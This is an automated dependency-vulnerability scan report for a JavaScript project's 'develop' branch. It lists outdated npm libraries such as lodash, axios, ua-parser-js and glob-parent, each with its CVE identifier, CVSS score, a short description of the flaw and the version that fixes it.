Library home page: https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.21.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
ua-parser-js >= 0.7.14, fixed in 0.7.24, uses a regular expression which is vulnerable to denial of service. If an attacker sends a malicious User-Agent header, ua-parser-js will get stuck processing it for an extended period of time.
Publish Date: 2021-03-17
URL: CVE-2021-27292
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2021-03-17
Fix Resolution (ua-parser-js): 0.7.24
Direct dependency fix Resolution (create-react-class): 15.7.0
Vulnerable Library - acorn-6.4.0.tgzECMAScript parser
Library home page: https://registry.npmjs.org/acorn/-/acorn-6.4.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/acorn/package.json
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
acorn is vulnerable to REGEX DoS. A regex of the form /[x-\ud800]/u causes the parser to enter an infinite loop. attackers may leverage the vulnerability leading to a Denial of Service since the string is not valid UTF16 and it results in it being sanitized before reaching the parser.
Publish Date: 2020-03-01
URL: WS-2020-0042
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/1488
Release Date: 2020-03-01
Fix Resolution (acorn): 6.4.1
Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20
Vulnerable Library - tunnel-agent-0.4.3.tgzHTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.
Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number.
Publish Date: 2017-03-05
URL: WS-2018-0076
CVSS 3 Score Details (5.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nodesecurity.io/advisories/598
Release Date: 2017-03-05
Fix Resolution: 0.6.0
Vulnerable Library - jsonpointer-4.0.1.tgzSimple JSON Addressing.
Library home page: https://registry.npmjs.org/jsonpointer/-/jsonpointer-4.0.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package jsonpointer before 5.0.0. A type confusion vulnerability can lead to a bypass of a previous Prototype Pollution fix when the pointer components are arrays.
Publish Date: 2021-11-03
URL: CVE-2021-23807
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23807
Release Date: 2021-11-03
Fix Resolution: jsonpointer - 5.0.0
Vulnerable Library - ssri-5.3.0.tgzStandard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.
Library home page: https://registry.npmjs.org/ssri/-/ssri-5.3.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
ssri 5.2.2-8.0.0, fixed in 8.0.1, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.
Publish Date: 2021-03-12
URL: CVE-2021-27290
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-vx3p-948g-6vhq
Release Date: 2021-03-12
Fix Resolution: ssri - 6.0.2,7.1.1,8.0.1
Vulnerable Library - sockjs-0.3.19.tgzSockJS-node is a server counterpart of SockJS-client a JavaScript library that provides a WebSocket-like object in the browser. SockJS gives you a coherent, cross-browser, Javascript API which creates a low latency, full duplex, cross-domain communication
Library home page: https://registry.npmjs.org/sockjs/-/sockjs-0.3.19.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.
Publish Date: 2020-07-09
URL: CVE-2020-7693
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-07-14
Fix Resolution (sockjs): 0.3.20
Direct dependency fix Resolution (webpack-dev-server): 3.11.0
Vulnerable Libraries - lodash-4.17.4.tgz, lodash-3.3.1.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz
Dependency Hierarchy:
The modern build of lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-3.3.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.
Publish Date: 2019-07-26
URL: CVE-2019-10744
CVSS 3 Score Details (9.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-jf85-cpcp-j695
Release Date: 2019-07-26
Fix Resolution: lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge- 4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0
Vulnerable Library - is-my-json-valid-2.20.0.tgzA [JSONSchema](https://json-schema.org/) validator that uses code generation to be extremely fast.
Library home page: https://registry.npmjs.org/is-my-json-valid/-/is-my-json-valid-2.20.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Regular Expression Denial of Service (ReDoS) vulnerability was found in is-my-json-valid before 2.20.2 via the style format.
Publish Date: 2020-06-27
URL: WS-2020-0342
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-06-27
Fix Resolution: is-my-json-valid - 2.20.2
Vulnerable Libraries - axios-0.19.0.tgz, axios-0.15.3.tgz
Promise based HTTP client for the browser and node.js
Library home page: https://registry.npmjs.org/axios/-/axios-0.19.0.tgz
Dependency Hierarchy:
Promise based HTTP client for the browser and node.js
Library home page: https://registry.npmjs.org/axios/-/axios-0.15.3.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
axios is vulnerable to Inefficient Regular Expression Complexity
Publish Date: 2021-08-31
URL: CVE-2021-3749
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://huntr.dev/bounties/1e8f07fc-c384-4ff9-8498-0690de2e8c31/
Release Date: 2021-08-31
Fix Resolution (axios): 0.20.0
Direct dependency fix Resolution (@storybook/addon-actions): 5.3.20
Fix Resolution (axios): 0.18.1
Direct dependency fix Resolution (github-api): 3.2.2
Vulnerable Library - xmlhttprequest-ssl-1.5.5.tgzXMLHttpRequest for Node
Library home page: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-1.5.5.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.
Publish Date: 2021-04-23
URL: CVE-2021-31597
CVSS 3 Score Details (9.4)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31597
Release Date: 2021-04-23
Fix Resolution (xmlhttprequest-ssl): 1.6.1
Direct dependency fix Resolution (karma): 5.0.8
Vulnerable Library - ua-parser-js-0.7.21.tgzLightweight JavaScript-based user-agent string parser
Library home page: https://registry.npmjs.org/ua-parser-js/-/ua-parser-js-0.7.21.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The package ua-parser-js before 0.7.22 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA.
Publish Date: 2020-09-16
URL: CVE-2020-7733
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7733
Release Date: 2020-09-16
Fix Resolution (ua-parser-js): 0.7.22
Direct dependency fix Resolution (create-react-class): 15.7.0
Vulnerable Libraries - glob-parent-3.1.0.tgz, glob-parent-5.1.0.tgz, glob-parent-5.1.1.tgz, glob-parent-2.0.0.tgz
Strips glob magic from a string to provide the parent directory path
Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-3.1.0.tgz
Dependency Hierarchy:
Extract the non-magic parent path from a glob string.
Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.0.tgz
Dependency Hierarchy:
Extract the non-magic parent path from a glob string.
Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.1.tgz
Dependency Hierarchy:
Strips glob magic from a string to provide the parent path
Library home page: https://registry.npmjs.org/glob-parent/-/glob-parent-2.0.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in enclosure containing path separator.
Publish Date: 2021-06-03
URL: CVE-2020-28469
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469
Release Date: 2021-06-03
Fix Resolution (glob-parent): 5.1.2
Direct dependency fix Resolution (@storybook/react): 6.5.0
Fix Resolution (glob-parent): 5.1.2
Direct dependency fix Resolution (stylelint): 13.2.1
Fix Resolution (glob-parent): 5.1.2
Direct dependency fix Resolution (webpack): 4.44.2
Fix Resolution (glob-parent): 5.1.2
Direct dependency fix Resolution (@storybook/react): 6.5.0
Vulnerable Library - jsonpointer-4.0.1.tgzSimple JSON Addressing.
Library home page: https://registry.npmjs.org/jsonpointer/-/jsonpointer-4.0.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Prototype Pollution vulnerability was found in jsonpointer before 4.1.0 via the set function.
Publish Date: 2020-07-03
URL: WS-2020-0345
CVSS 3 Score Details (8.2)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-07-03
Fix Resolution: jsonpointer - 4.1.0
Vulnerable Library - serialize-javascript-1.9.1.tgzSerialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
The serialize-javascript npm package before version 2.1.1 is vulnerable to Cross-site Scripting (XSS). It does not properly mitigate against unsafe characters in serialized regular expressions. This vulnerability is not affected on Node.js environment since Node.js's implementation of RegExp.prototype.toString() backslash-escapes all forward slashes in regular expressions. If serialized data of regular expression objects are used in an environment other than Node.js, it is affected by this vulnerability.
Publish Date: 2019-12-05
URL: CVE-2019-16769
CVSS 3 Score Details (5.4)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16769
Release Date: 2020-01-17
Fix Resolution (serialize-javascript): 2.1.1
Direct dependency fix Resolution (copy-webpack-plugin): 5.0.5
Vulnerable Libraries - npm-2.15.12.tgz, npm-5.1.0.tgz
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-2.15.12.tgz
Dependency Hierarchy:
a package manager for JavaScript
Library home page: https://registry.npmjs.org/npm/-/npm-5.1.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like "://[[:]@][:][:][/]". The password value is not redacted and is printed to stdout and also to any generated log files.
Publish Date: 2020-07-07
URL: CVE-2020-15095
CVSS 3 Score Details (4.4)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-93f3-23rq-pjfp
Release Date: 2020-07-07
Fix Resolution: npm - 6.14.6
Vulnerable Library - react-dev-utils-9.1.0.tgzWebpack utilities used by Create React App
Library home page: https://registry.npmjs.org/react-dev-utils/-/react-dev-utils-9.1.0.tgz
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
react-dev-utils prior to v11.0.4 exposes a function, getProcessForPort, where an input argument is concatenated into a command string to be executed. This function is typically used from react-scripts (in Create React App projects), where the usage is safe. Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.
Publish Date: 2021-03-09
URL: CVE-2021-24033
CVSS 3 Score Details (5.6)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.facebook.com/security/advisories/cve-2021-24033
Release Date: 2021-03-09
Fix Resolution (react-dev-utils): 11.0.4
Direct dependency fix Resolution (@storybook/react): 6.1.20
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
